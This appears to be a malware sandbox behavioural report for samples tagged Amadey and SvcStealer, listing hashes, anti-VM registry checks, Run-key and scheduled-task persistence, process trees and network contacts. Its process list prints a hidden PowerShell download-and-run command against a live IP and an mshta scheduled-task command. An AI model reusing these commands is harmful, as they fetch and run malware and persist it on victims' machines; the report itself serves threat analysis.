| SHA1 | abd6c5a44730270ae9f2fce698c0f5d2594eac2f |
| SHA256 | a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b |
| SHA512 | b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718 |
memory/1936-404-0x0000000006A00000-0x0000000006E9B000-memory.dmp
memory/1936-403-0x0000000006A00000-0x0000000006E9B000-memory.dmp
memory/2824-406-0x00000000010F0000-0x000000000158B000-memory.dmp
memory/1936-411-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
| MD5 | 3babce4f85902c7bcfde22e222508c4e |
| SHA1 | 4898ae5c075322b47ab2f512b5463ee6116d98f7 |
| SHA256 | 06b678b55cb81e6999b25903def2ac02336dc6c9ff3cd6afdaafffd55e2e5302 |
| SHA512 | f8687729c8931579f8120f6451f669726f115123c10a7c5ce6d9a24746940153efcf7e33b719e8f543f9b4316db485633272943f462bf948b4044f234795d629 |
memory/2824-424-0x00000000010F0000-0x000000000158B000-memory.dmp
memory/1936-425-0x0000000006A00000-0x0000000006E9B000-memory.dmp
memory/1936-426-0x0000000006A00000-0x0000000006E9B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
| MD5 | 19668940080169c70b830bed8c390783 |
| SHA1 | 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1 |
| SHA256 | cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c |
| SHA512 | c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2 |
memory/880-440-0x000000013F390000-0x000000013F42F000-memory.dmp
memory/1936-439-0x0000000005400000-0x000000000549F000-memory.dmp
memory/1936-438-0x0000000005400000-0x000000000549F000-memory.dmp
memory/1208-441-0x0000000003E30000-0x0000000003ED5000-memory.dmp
memory/1208-443-0x0000000003E30000-0x0000000003ED5000-memory.dmp
memory/1208-447-0x0000000003E30000-0x0000000003ED5000-memory.dmp
memory/880-446-0x000000013F390000-0x000000013F42F000-memory.dmp
memory/1936-448-0x0000000000F00000-0x000000000139F000-memory.dmp
memory/1936-449-0x0000000005400000-0x000000000549F000-memory.dmp
memory/1936-450-0x0000000005400000-0x000000000549F000-memory.dmp
memory/1580-452-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1936-453-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
| MD5 | e82c4c3f7a2994eeecc1f81a5e4a4180 |
| SHA1 | 660820f778073332dcd5ec446d2fcf00de887abd |
| SHA256 | 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3 |
| SHA512 | 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76 |
C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
| MD5 | 02579a797e919dcaf5758fbcbe34b093 |
| SHA1 | 7668fff0888f4c7ad7a83b24f8c6d4009c10e534 |
| SHA256 | 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c |
| SHA512 | 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5 |
memory/1936-554-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
| MD5 | f53198e8b444658cf7134f5ccb466a98 |
| SHA1 | 0283e56ed7201eecfc7dad30cc6f3f30d677be66 |
| SHA256 | 936004bbb9d3c4763c0e36cc887b21315ae6c2d55c366cb3b3390d480b827107 |
| SHA512 | ee40f63f7b75cc1b55d11c56c25086d2d66ae86a3f65326d5a75cf0f2fac94ebee622cd4844b4f6468b2bfd011ab80558f41e1b62d2a7864b0ce7f61d3bdcf09 |
memory/2300-567-0x00000000041E0000-0x0000000004603000-memory.dmp
memory/2372-569-0x0000000000400000-0x0000000000823000-memory.dmp
memory/2300-568-0x00000000041E0000-0x0000000004603000-memory.dmp
memory/2336-572-0x0000000000170000-0x00000000001D5000-memory.dmp
memory/1936-577-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
| MD5 | dab2bc3868e73dd0aab2a5b4853d9583 |
| SHA1 | 3dadfc676570fc26fc2406d948f7a6d4834a6e2c |
| SHA256 | 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb |
| SHA512 | 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8 |
memory/1936-590-0x0000000006A00000-0x00000000070EE000-memory.dmp
memory/1936-591-0x0000000006A00000-0x00000000070EE000-memory.dmp
memory/1824-592-0x0000000000970000-0x000000000105E000-memory.dmp
memory/2300-593-0x00000000041E0000-0x0000000004603000-memory.dmp
memory/2300-594-0x00000000041E0000-0x0000000004603000-memory.dmp
memory/2372-595-0x0000000000400000-0x0000000000823000-memory.dmp
memory/2372-596-0x0000000000400000-0x0000000000823000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
| MD5 | 22892b8303fa56f4b584a04c09d508d8 |
| SHA1 | e1d65daaf338663006014f7d86eea5aebf142134 |
| SHA256 | 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f |
| SHA512 | 852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744 |
memory/1936-614-0x0000000000F00000-0x000000000139F000-memory.dmp
memory/1824-615-0x0000000000970000-0x000000000105E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe
| MD5 | da3a7687a7f215bbbc93fe62e0afa1ea |
| SHA1 | ee56166cf511655e53b4bbd796247c9810037476 |
| SHA256 | 231b4d3c2b060b288878d7c28fb536c22f3844a54bf003eaf3b0da4808ffd63d |
| SHA512 | 374c8ecdfbd339f0064c9c799ff428086e49e82c053ddcb25b3a84c850ad6c1fa009f8833804330e8c16c489088496dbbdc74f6ee6970be4f0e2e996ed2cd75a |
memory/1696-744-0x0000000001170000-0x000000000160F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd
| MD5 | cedac8d9ac1fbd8d4cfc76ebe20d37f9 |
| SHA1 | b0db8b540841091f32a91fd8b7abcd81d9632802 |
| SHA256 | 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b |
| SHA512 | ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5 |
memory/2372-759-0x0000000000400000-0x0000000000823000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YYMSUYSSQ3CAKYLT6H5V.temp
| MD5 | 29c618e15d21bc79ac7d3b3af1291cef |
| SHA1 | 372437f7e7ffa08dc419ec8caef214063e257107 |
| SHA256 | 1562cc7e2bb4afa829250ff827198b5490f32ea8da9264a08c8e38fe66ce9e45 |
| SHA512 | 26450f65deed7c371c78c4864b7f4571e8f354c258469c2a8cd6c107e5a5dd8f1e0d06bbf1cb3b6af616d8efb8fe7efac479ec5204d68a26da9fa91526a740ef |
memory/1936-831-0x0000000000F00000-0x000000000139F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe
| MD5 | 77c8daa35f8fa536031bca64e567107b |
| SHA1 | 0524411a8f30adf2b1d95c071eaa4ff900c9b702 |
| SHA256 | d0c87ac8cb00fd5d5aedbdeb6c747327969ae5ba1d031b902697ac5a9aa5fb02 |
| SHA512 | dbcc132580a51abc93a36cf1303a5139937a3e556902c28f516185d940b7a49217f4dd50ccad92a763b5e1e9563b963bed2d713fb45497c56f93bba59cb0bedd |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 03:56
Reported
2025-03-05 03:57
Platform
win10v2004-20250217-en
Max time kernel
34s
Max time network
46s
Command Line
Signatures
Amadey
Amadey family
Detects SvcStealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SvcStealer, Diamotrix
Svcstealer family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cebafffffcbc = "\"C:\\ProgramData\\cebafffffcbc.exe\"" | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
"C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
"C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"
C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
| MD5 | 42bcecbc4a9d0c9e72120f0a60102147 |
| SHA1 | 026d375bc2a684027fb8532af83ce2991509e1f1 |
| SHA256 | 303332f5d6160d3604c26f26245225fcdb46887b69f741b346b35948cbb1b23b |
| SHA512 | d6438e784658959e18c3b867bac7e406131011dc5146db4ce9781469e4cabee4630dd6b79106b7b507fe03e748a51516855dcae59f4ac0b2ab29416f339c4498 |
memory/4824-2-0x0000000002A60000-0x0000000002A96000-memory.dmp
memory/4824-3-0x0000000005210000-0x0000000005838000-memory.dmp
memory/4824-4-0x00000000051A0000-0x00000000051C2000-memory.dmp
memory/4824-5-0x0000000005970000-0x00000000059D6000-memory.dmp
memory/4824-6-0x00000000059E0000-0x0000000005A46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vad1iwme.c10.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4824-16-0x0000000005B50000-0x0000000005EA4000-memory.dmp
memory/4824-17-0x0000000006040000-0x000000000605E000-memory.dmp
memory/4824-18-0x0000000006090000-0x00000000060DC000-memory.dmp
memory/4824-19-0x0000000007780000-0x0000000007DFA000-memory.dmp
memory/4824-20-0x0000000006580000-0x000000000659A000-memory.dmp
memory/4824-22-0x00000000075A0000-0x0000000007636000-memory.dmp
memory/4824-23-0x0000000007530000-0x0000000007552000-memory.dmp
memory/4824-24-0x00000000083B0000-0x0000000008954000-memory.dmp
C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
| MD5 | 3147e388f1f2ad94f26aee55a4267b8c |
| SHA1 | b3dfd5bb152b1b8e338586ea1e2d240cde6503b3 |
| SHA256 | 49ac9312c49ff99d5af392d17450747038fcbd6f319ebf981916fcf44120aa2b |
| SHA512 | 720b48b08c502c153ecdaeb6fa8a2e374187a71655a88493dc70b266fe16ce88d342aaceefbe5a35fa9db93911510baee7fb578786e44ae6da637369f56443e9 |
memory/1244-32-0x0000000000400000-0x000000000089F000-memory.dmp
memory/4328-46-0x0000000000230000-0x00000000006CF000-memory.dmp
memory/1244-48-0x0000000000400000-0x000000000089F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
| MD5 | 19668940080169c70b830bed8c390783 |
| SHA1 | 5e6b72e52abc7d221d512111e39cbdd3f2ad40c1 |
| SHA256 | cdbc641b8c23b5699f899b408394ecfc946af9ac7a38c5d44c78a4a938e7b02c |
| SHA512 | c322eba01ff4544b8077ec400f15ecffd3b66f89e0e0e26946224771c1ffb9c687ff4adc2e0a5e6b119766b3c8300971cfc2c990ff48346d9d3d514ab5d4bed2 |
memory/1624-63-0x00007FF615DB0000-0x00007FF615E4F000-memory.dmp
memory/3424-65-0x00000000091C0000-0x0000000009265000-memory.dmp
memory/1624-68-0x00007FF615DB0000-0x00007FF615E4F000-memory.dmp
memory/3424-64-0x00000000091C0000-0x0000000009265000-memory.dmp
memory/4328-69-0x0000000000230000-0x00000000006CF000-memory.dmp
memory/4328-70-0x0000000000230000-0x00000000006CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
| MD5 | e82c4c3f7a2994eeecc1f81a5e4a4180 |
| SHA1 | 660820f778073332dcd5ec446d2fcf00de887abd |
| SHA256 | 11eec5d71c7fadae9d7176448d8fff3de44ec8d3b4df86f0eca59e06adf202d3 |
| SHA512 | 4d3e42e68b9fa6330edfee677ad55ae24964c33d6fd2d25ba6c2876d80f8d9cbc999c6e27192ce58a45559d00b3c0bc71ddbee1ad8d6fd7083b705ef5cf84d76 |
memory/4980-89-0x0000000000230000-0x00000000006CF000-memory.dmp
memory/4980-91-0x0000000000230000-0x00000000006CF000-memory.dmp
memory/4328-92-0x0000000000230000-0x00000000006CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
| MD5 | 02579a797e919dcaf5758fbcbe34b093 |
| SHA1 | 7668fff0888f4c7ad7a83b24f8c6d4009c10e534 |
| SHA256 | 0a63a310dfc4ce680c96f72f5b9c9559f9e6d9c3d99f48c8782ee43c56a8728c |
| SHA512 | 2b99b620ca06f03a1924c0ab2feef96142df6ff16558d30c37e8b3e5602e5d5b2ecd4e7bd3b4499ef64a0eb32cb136821442e79b3aa66caf42467c749116e5f5 |